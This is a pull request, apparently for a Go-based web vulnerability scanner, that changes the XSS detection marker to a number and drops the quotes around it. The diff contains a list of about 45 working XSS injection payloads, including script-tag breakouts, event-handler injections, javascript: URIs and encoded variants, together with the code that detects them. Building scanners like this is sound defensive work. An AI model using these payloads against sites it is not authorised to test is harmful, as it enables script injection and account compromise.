### PR TITLE
style(landmarkを使っている場所): landmarkを数字に変更するとともにダブルクオーテーションを削除しました。

### DIFF
--- a/api/models/scanner/approaches.go
+++ b/api/models/scanner/approaches.go
@@ -256,8 +256,8 @@ func detectReflectedXSS(d determinant, req []*http.Request) {
 	var evidence string
 	doc.Find("script").EachWithBreak(func(_ int, s *goquery.Selection) bool {
 		injectedPayload := s.Text()
-		if strings.Contains(injectedPayload, "alert(\""+d.landmark+"\")") {
-			evidence = "alert(\"" + d.landmark + "\")"
+		if strings.Contains(injectedPayload, "alert("+d.landmark+")") {
+			evidence = "alert(" + d.landmark + ")"
 			flg = true
 			return false
 		}
@@ -267,28 +267,28 @@ func detectReflectedXSS(d determinant, req []*http.Request) {
 	if !flg {
 		doc.Find("*").EachWithBreak(func(_ int, s *goquery.Selection) bool {
 			href, _ := s.Attr("href")
-			if strings.HasPrefix(href, "javascript:alert(\""+d.landmark+"\")") {
-				evidence = "javascript:alert(\"" + d.landmark + "\")"
+			if strings.HasPrefix(href, "javascript:alert("+d.landmark+")") {
+				evidence = "javascript:alert(" + d.landmark + ")"
 				flg = true
 				return false
 			}
 			src, _ := s.Attr("src")
-			if strings.HasPrefix(src, "javascript:alert(\""+d.landmark+"\")") {
-				evidence = "javascript:alert(\"" + d.landmark + "\")"
+			if strings.HasPrefix(src, "javascript:alert("+d.landmark+")") {
+				evidence = "javascript:alert(" + d.landmark + ")"
 				flg = true
 				return false
 			}
 			if src == "x" {
 				onerror, _ := s.Attr("onerror")
-				if strings.Contains(onerror, "alert(\""+d.landmark+"\")") {
-					evidence = "alert(\"" + d.landmark + "\")"
+				if strings.Contains(onerror, "alert("+d.landmark+")") {
+					evidence = "alert(" + d.landmark + ")"
 					flg = true
 					return false
 				}
 			}
 			onmouseover, _ := s.Attr("onmouseover")
-			if strings.Contains(onmouseover, "alert(\""+d.landmark+"\")") {
-				evidence = "alert(\"" + d.landmark + "\")"
+			if strings.Contains(onmouseover, "alert("+d.landmark+")") {
+				evidence = "alert(" + d.landmark + ")"
 				flg = true
 				return false
 			}
@@ -411,8 +411,8 @@ func detectStoredXSS(d determinant, req []*http.Request) {
 		var evidence string
 		doc.Find("script").EachWithBreak(func(_ int, s *goquery.Selection) bool {
 			injectedPayload := s.Text()
-			if strings.Contains(injectedPayload, "alert(\""+d.landmark+"\")") {
-				evidence = "alert(\"" + d.landmark + "\")"
+			if strings.Contains(injectedPayload, "alert("+d.landmark+")") {
+				evidence = "alert(" + d.landmark + ")"
 				flg = true
 				return false
 			}
@@ -422,28 +422,28 @@ func detectStoredXSS(d determinant, req []*http.Request) {
 		if !flg {
 			doc.Find("*").EachWithBreak(func(_ int, s *goquery.Selection) bool {
 				href, _ := s.Attr("href")
-				if strings.HasPrefix(href, "javascript:alert(\""+d.landmark+"\")") {
-					evidence = "javascript:alert(\"" + d.landmark + "\")"
+				if strings.HasPrefix(href, "javascript:alert("+d.landmark+")") {
+					evidence = "javascript:alert(" + d.landmark + ")"
 					flg = true
 					return false
 				}
 				src, _ := s.Attr("src")
-				if strings.HasPrefix(src, "javascript:alert(\""+d.landmark+"\")") {
-					evidence = "javascript:alert(\"" + d.landmark + "\")"
+				if strings.HasPrefix(src, "javascript:alert("+d.landmark+")") {
+					evidence = "javascript:alert(" + d.landmark + ")"
 					flg = true
 					return false
 				}
 				if src == "x" {
 					onerror, _ := s.Attr("onerror")
-					if strings.Contains(onerror, "alert(\""+d.landmark+"\")") {
-						evidence = "alert(\"" + d.landmark + "\")"
+					if strings.Contains(onerror, "alert("+d.landmark+")") {
+						evidence = "alert(" + d.landmark + ")"
 						flg = true
 						return false
 					}
 				}
 				onmouseover, _ := s.Attr("onmouseover")
-				if strings.Contains(onmouseover, "alert(\""+d.landmark+"\")") {
-					evidence = "alert(\"" + d.landmark + "\")"
+				if strings.Contains(onmouseover, "alert("+d.landmark+")") {
+					evidence = "alert(" + d.landmark + ")"
 					flg = true
 					return false
 				}

--- a/api/models/scanner/payload/XSS.txt
+++ b/api/models/scanner/payload/XSS.txt
@@ -1,45 +1,45 @@
-<script>alert("[landmark]")</script>
-"><script>alert("[landmark]")</script>
-</textarea><script>alert("[landmark]")</script>
-<script>alert("[landmark]")</script>
-<<script>alert("[landmark]");//<</script>
-<script>alert("[landmark]")</script>
-'><script>alert("[landmark]")</script>
-'><script>alert("[landmark]");</script>
-; alert("[landmark]");//
-'; alert("[landmark]");//
-";alert("[landmark]");//
-\'; alert("[landmark]");//
-\";alert("[landmark]");//
-*/alert("[landmark]");//
-%3cscript%3ealert("[landmark]");%3c/script%3e
-%3cscript%3ealert("[landmark]");%3c%2fscript%3e
-%3Cscript%3Ealert("[landmark]");%3C/script%3E
-&ltscript&gtalert("[landmark]");</script>
-&ltscript&gtalert("[landmark]");&ltscript&gtalert
-<xss><script>alert("[landmark]")</script></vulnerable>
-</iframe><script>alert("[landmark]")</script>
-</noembed><script>alert("[landmark]")</script>
-</noframes><script>alert("[landmark]")</script>
-</noscript><script>alert("[landmark]")</script>
-</style><script>alert("[landmark]")</script>
-</title><script>alert("[landmark]")</script>
-</xmp><script>alert("[landmark]")</script>
-</script><script>alert("[landmark]")</script>
---><script>alert("[landmark]")</script>
-';</script><script>alert("[landmark]")</script>
-";</script><script>alert("[landmark]")</script>
-%00<script>alert("[landmark]")</script>
-%0d%0a<script>alert("[landmark]")</script>
-<a href='javascript:alert("[landmark]")'>click me</a>
-<img src="x" onerror='alert("[landmark]")'>
-<img/src/onerror=alert("[landmark]")>
-<iframe src='javascript:alert("[landmark]")'></iframe>
- onmouseover='alert("[landmark]")'
-" onmouseover='alert("[landmark]")'
-' onmouseover='alert("[landmark]")'
-\" onmouseover='alert("[landmark]")'
-\' onmouseover='alert("[landmark]")'
-javascript:alert("[landmark]")
-%253Cscript%253Ealert%28%2522[landmark]%2522%29%253C%252Fscript%253E
-%3Cscript%3Ealert(%22[landmark]%22)%3C%2Fscript%3E
+<script>alert([landmark])</script>
+"><script>alert([landmark])</script>
+</textarea><script>alert([landmark])</script>
+<script>alert([landmark])</script>
+<<script>alert([landmark]);//<</script>
+<script>alert([landmark])</script>
+'><script>alert([landmark])</script>
+'><script>alert([landmark]);</script>
+; alert([landmark]);//
+'; alert([landmark]);//
+";alert([landmark]);//
+\'; alert([landmark]);//
+\";alert([landmark]);//
+*/alert([landmark]);//
+%3cscript%3ealert([landmark]);%3c/script%3e
+%3cscript%3ealert([landmark]);%3c%2fscript%3e
+%3Cscript%3Ealert([landmark]);%3C/script%3E
+&ltscript&gtalert([landmark]);</script>
+&ltscript&gtalert([landmark]);&ltscript&gtalert
+<xss><script>alert([landmark])</script></vulnerable>
+</iframe><script>alert([landmark])</script>
+</noembed><script>alert([landmark])</script>
+</noframes><script>alert([landmark])</script>
+</noscript><script>alert([landmark])</script>
+</style><script>alert([landmark])</script>
+</title><script>alert([landmark])</script>
+</xmp><script>alert([landmark])</script>
+</script><script>alert([landmark])</script>
+--><script>alert([landmark])</script>
+';</script><script>alert([landmark])</script>
+";</script><script>alert([landmark])</script>
+%00<script>alert([landmark])</script>
+%0d%0a<script>alert([landmark])</script>
+<a href='javascript:alert([landmark])'>click me</a>
+<img src="x" onerror='alert([landmark])'>
+<img/src/onerror=alert([landmark])>
+<iframe src='javascript:alert([landmark])'></iframe>
+ onmouseover='alert([landmark])'
+" onmouseover='alert([landmark])'
+' onmouseover='alert([landmark])'
+\" onmouseover='alert([landmark])'
+\' onmouseover='alert([landmark])'
+javascript:alert([landmark])
+%253Cscript%253Ealert%28[landmark]%29%253C%252Fscript%253E
+%3Cscript%3Ealert([landmark])%3C%2Fscript%3E

--- a/api/models/scanner/scannerutil.go
+++ b/api/models/scanner/scannerutil.go
@@ -394,7 +394,7 @@ func initLandmark(n int) func() string {
 	cnt := n
 	return func() string {
 		cnt++
-		return "Himawari" + fmt.Sprintf("%05d", cnt)
+		return fmt.Sprintf("65535%05d", cnt)
 	}
 }
 


### PR DESCRIPTION
## 概要
landmarkの値を`Himawari + 00001`から`65535+00001`に変更をしました。
これに伴いダブルクオーテーションが必要なくなりました。
grepを使い確認しましたが、もう一度確認をお願いします。

### 関連するIssue
#127

<!--
解決したIssueがある場合は、以下のように`Resolves`を付与した形で記述してください。
### 解決したIssue
Resolves #<issue番号>
-->

## 変更点
landmarkを使っている場所のダブルクオーテーションを外しました。
initlandmarkでHimawariを消し、65535を追加しました。

<!--
## 変更しなかったこと
今回のPRののスコープ外とすることがあれば記述する。
-->

## チェック項目
<!-- 必要に応じて[ ]を[x]にしてチェックを入れてください。 -->
- [x] 機能が正常に動作することを確認しました。

<!--
## 再現手順
再現のために特別な操作をする必要がある場合に記述する。
再現手順と結果を記述する。
-->

<!--
## 課題
悩んでいるところ、特に、レビューしてほしいところがあれば記述する。
-->

<!--
## 備考
その他補足事項があれば記述する。
-->
